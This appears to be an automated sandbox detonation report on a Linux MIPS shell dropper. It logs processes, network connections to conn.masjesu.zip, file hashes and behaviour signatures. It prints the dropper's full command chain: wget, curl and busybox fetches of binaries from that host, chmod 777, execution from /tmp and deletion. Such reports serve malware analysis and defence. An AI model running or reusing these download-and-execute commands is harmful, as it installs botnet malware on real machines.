[/bin/busybox wget http://conn.masjesu.zip/bins/QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W7]

/bin/chmod

[chmod 777 QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W7]

/tmp/QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W7

[./QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W7]

/bin/rm

[rm QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W7]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr]

/bin/chmod

[chmod 777 J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr]

/tmp/J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr

[./J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr]

/bin/rm

[rm J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv]

/bin/chmod

[chmod 777 EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv]

/tmp/EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv

[./EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv]

/bin/rm

[rm EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB74]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB74]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB74]

/bin/chmod

[chmod 777 0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB74]

/tmp/0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB74

[./0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB74]

/bin/rm

[rm 0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB74]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/2PhZQ4FmiWiAI527icss1J88hOzCWIR92Y]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/2PhZQ4FmiWiAI527icss1J88hOzCWIR92Y]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/2PhZQ4FmiWiAI527icss1J88hOzCWIR92Y]

/bin/chmod

[chmod 777 2PhZQ4FmiWiAI527icss1J88hOzCWIR92Y]

/tmp/2PhZQ4FmiWiAI527icss1J88hOzCWIR92Y

[./2PhZQ4FmiWiAI527icss1J88hOzCWIR92Y]

/bin/rm

[rm 2PhZQ4FmiWiAI527icss1J88hOzCWIR92Y]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/PB4ZOVQ1M7wwG58lSyoc59M13IwrdnjMQr]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/PB4ZOVQ1M7wwG58lSyoc59M13IwrdnjMQr]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/PB4ZOVQ1M7wwG58lSyoc59M13IwrdnjMQr]

/bin/chmod

[chmod 777 PB4ZOVQ1M7wwG58lSyoc59M13IwrdnjMQr]

/tmp/PB4ZOVQ1M7wwG58lSyoc59M13IwrdnjMQr

[./PB4ZOVQ1M7wwG58lSyoc59M13IwrdnjMQr]

/bin/rm

[rm PB4ZOVQ1M7wwG58lSyoc59M13IwrdnjMQr]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/ETDKlCBz4cBM5l0FupJVVh3slmjvFhZJ7g]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/ETDKlCBz4cBM5l0FupJVVh3slmjvFhZJ7g]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/ETDKlCBz4cBM5l0FupJVVh3slmjvFhZJ7g]

/bin/chmod

[chmod 777 ETDKlCBz4cBM5l0FupJVVh3slmjvFhZJ7g]

/tmp/ETDKlCBz4cBM5l0FupJVVh3slmjvFhZJ7g

[./ETDKlCBz4cBM5l0FupJVVh3slmjvFhZJ7g]

/bin/rm

[rm ETDKlCBz4cBM5l0FupJVVh3slmjvFhZJ7g]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Ru6sKX81l2lQt7XDsPKYP4FnQKN2pKXImR]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Ru6sKX81l2lQt7XDsPKYP4FnQKN2pKXImR]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Ru6sKX81l2lQt7XDsPKYP4FnQKN2pKXImR]

/bin/chmod

[chmod 777 Ru6sKX81l2lQt7XDsPKYP4FnQKN2pKXImR]

/tmp/Ru6sKX81l2lQt7XDsPKYP4FnQKN2pKXImR

[./Ru6sKX81l2lQt7XDsPKYP4FnQKN2pKXImR]

/bin/rm

[rm Ru6sKX81l2lQt7XDsPKYP4FnQKN2pKXImR]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/JF6z14qvFTJKmcwYSnYZh5ySFX9q4ftSfR]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/JF6z14qvFTJKmcwYSnYZh5ySFX9q4ftSfR]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/JF6z14qvFTJKmcwYSnYZh5ySFX9q4ftSfR]

/bin/chmod

[chmod 777 JF6z14qvFTJKmcwYSnYZh5ySFX9q4ftSfR]

/tmp/JF6z14qvFTJKmcwYSnYZh5ySFX9q4ftSfR

[./JF6z14qvFTJKmcwYSnYZh5ySFX9q4ftSfR]

/bin/rm

[rm JF6z14qvFTJKmcwYSnYZh5ySFX9q4ftSfR]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf]

/bin/chmod

[chmod 777 V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf]

/tmp/V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf

[./V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf]

/bin/rm

[rm V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n]

/bin/chmod

[chmod 777 4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n]

/tmp/4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n

[./4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n]

/bin/rm

[rm 4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/r1VEdjkHejuMJk5bGG2ytM2ZEzDqtyEMAJ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/r1VEdjkHejuMJk5bGG2ytM2ZEzDqtyEMAJ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/r1VEdjkHejuMJk5bGG2ytM2ZEzDqtyEMAJ]

/bin/chmod

[chmod 777 r1VEdjkHejuMJk5bGG2ytM2ZEzDqtyEMAJ]

/tmp/r1VEdjkHejuMJk5bGG2ytM2ZEzDqtyEMAJ

[./r1VEdjkHejuMJk5bGG2ytM2ZEzDqtyEMAJ]

/bin/rm

[rm r1VEdjkHejuMJk5bGG2ytM2ZEzDqtyEMAJ]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp

Files

/tmp/V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral4

Detonation Overview

Submitted

2024-10-25 01:10

Reported

2024-10-25 01:13

Platform

debian9-mipsel-20240226-en

Max time kernel

148s

Max time network

154s

Command Line

[/tmp/15b0752bf0316b73d6e514baf006cd60fc4668e67b565151f619655d19fd435a.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf /tmp/V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf N/A
N/A /tmp/4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n /tmp/4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n N/A
N/A /tmp/JF6z14qvFTJKmcwYSnYZh5ySFX9q4ftSfR /tmp/JF6z14qvFTJKmcwYSnYZh5ySFX9q4ftSfR N/A
N/A /tmp/r1VEdjkHejuMJk5bGG2ytM2ZEzDqtyEMAJ /tmp/r1VEdjkHejuMJk5bGG2ytM2ZEzDqtyEMAJ N/A
N/A /tmp/KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya /tmp/KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya N/A
N/A /tmp/QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W7 /tmp/QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W7 N/A
N/A /tmp/J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr /tmp/J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr N/A
N/A /tmp/gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO /tmp/gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO N/A
N/A /tmp/0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB74 /tmp/0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB74 N/A
N/A /tmp/2PhZQ4FmiWiAI527icss1J88hOzCWIR92Y /tmp/2PhZQ4FmiWiAI527icss1J88hOzCWIR92Y N/A
N/A /tmp/PB4ZOVQ1M7wwG58lSyoc59M13IwrdnjMQr /tmp/PB4ZOVQ1M7wwG58lSyoc59M13IwrdnjMQr N/A
N/A /tmp/ETDKlCBz4cBM5l0FupJVVh3slmjvFhZJ7g /tmp/ETDKlCBz4cBM5l0FupJVVh3slmjvFhZJ7g N/A
N/A /tmp/Ru6sKX81l2lQt7XDsPKYP4FnQKN2pKXImR /tmp/Ru6sKX81l2lQt7XDsPKYP4FnQKN2pKXImR N/A
N/A /tmp/EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv /tmp/EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv N/A
N/A /tmp/gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO /tmp/gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO N/A
N/A /tmp/KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya /tmp/KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya N/A
N/A /tmp/QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W7 /tmp/QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W7 N/A
N/A /tmp/J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr /tmp/J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr N/A
N/A /tmp/EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv /tmp/EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv N/A
N/A /tmp/0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB74 /tmp/0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB74 N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/JF6z14qvFTJKmcwYSnYZh5ySFX9q4ftSfR /usr/bin/curl N/A
File opened for modification /tmp/r1VEdjkHejuMJk5bGG2ytM2ZEzDqtyEMAJ /usr/bin/curl N/A
File opened for modification /tmp/KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya /usr/bin/curl N/A
File opened for modification /tmp/ETDKlCBz4cBM5l0FupJVVh3slmjvFhZJ7g /usr/bin/curl N/A
File opened for modification /tmp/Ru6sKX81l2lQt7XDsPKYP4FnQKN2pKXImR /usr/bin/curl N/A
File opened for modification /tmp/0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB74 /usr/bin/curl N/A
File opened for modification /tmp/2PhZQ4FmiWiAI527icss1J88hOzCWIR92Y /usr/bin/curl N/A
File opened for modification /tmp/QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W7 /usr/bin/curl N/A
File opened for modification /tmp/4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n /usr/bin/curl N/A
File opened for modification /tmp/QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W7 /usr/bin/curl N/A
File opened for modification /tmp/PB4ZOVQ1M7wwG58lSyoc59M13IwrdnjMQr /usr/bin/curl N/A
File opened for modification /tmp/KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya /usr/bin/curl N/A
File opened for modification /tmp/EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv /usr/bin/curl N/A
File opened for modification /tmp/V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf /usr/bin/curl N/A
File opened for modification /tmp/J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr /usr/bin/curl N/A
File opened for modification /tmp/gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO /usr/bin/curl N/A
File opened for modification /tmp/0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB74 /usr/bin/curl N/A
File opened for modification /tmp/EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv /usr/bin/curl N/A
File opened for modification /tmp/gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO /usr/bin/curl N/A
File opened for modification /tmp/J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr /usr/bin/curl N/A

Processes

/tmp/15b0752bf0316b73d6e514baf006cd60fc4668e67b565151f619655d19fd435a.sh

[/tmp/15b0752bf0316b73d6e514baf006cd60fc4668e67b565151f619655d19fd435a.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf]

/bin/chmod

[chmod 777 V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf]

/tmp/V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf

[./V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf]

/bin/rm

[rm V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n]

/bin/chmod

[chmod 777 4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n]

/tmp/4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n

[./4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n]

/bin/rm

[rm 4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n]

/usr/bin/wget

